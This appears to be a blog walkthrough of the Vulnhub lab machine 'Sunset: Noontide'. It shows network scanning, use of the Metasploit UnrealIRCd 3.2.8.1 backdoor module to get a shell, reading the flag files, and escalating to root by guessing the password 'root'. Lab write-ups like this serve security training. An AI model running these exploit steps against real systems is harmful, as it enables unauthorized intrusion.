This walkthrough covers the box ‘Sunset: Noontide’ available on Vulnhub. It is rated as very easy and indeed, it is straightforward to complete.
So, let’s get started!!
netdiscover (to fing ip address)
Press enter or click to view image in full size
nmap -p- -A -sV 192.168.1.4
Press enter or click to view image in full size
After checking for a backdoor exploit for UnrealIRCD in google, I found one.
Now using msfconsole, we will create backdoor.
msfconsole
Press enter or click to view image in full size
use exploit/unix/irc/unreal_ircd_3281_backdoor
show options
set RHOSTS 192.168.1.4
Press enter or click to view image in full size
show payloads
set payload 1
Press enter or click to view image in full size
exploit
Press enter or click to view image in full size
After this I gained access to the the machine.
Get Anshika’s stories in your inbox
Join Medium for free to get updates from this writer.
In home directory there is a folder called server and in that folder is the user flag.
id
whoami
ls -la /home
ls -la /home/server
cat /home/server/local.txt
Press enter or click to view image in full size
Next step isto escalate the privilege. While trying to do so I guessed the password for root as root and got the access. And in the root directory there was the root flag.
su root
root (it is the password)
id
ls -la /root
cat /root/proof.txt
Press enter or click to view image in full size
And we got the the flag!
It was very easy machine. Hope you find this walkthrough useful.
Thanks for reading.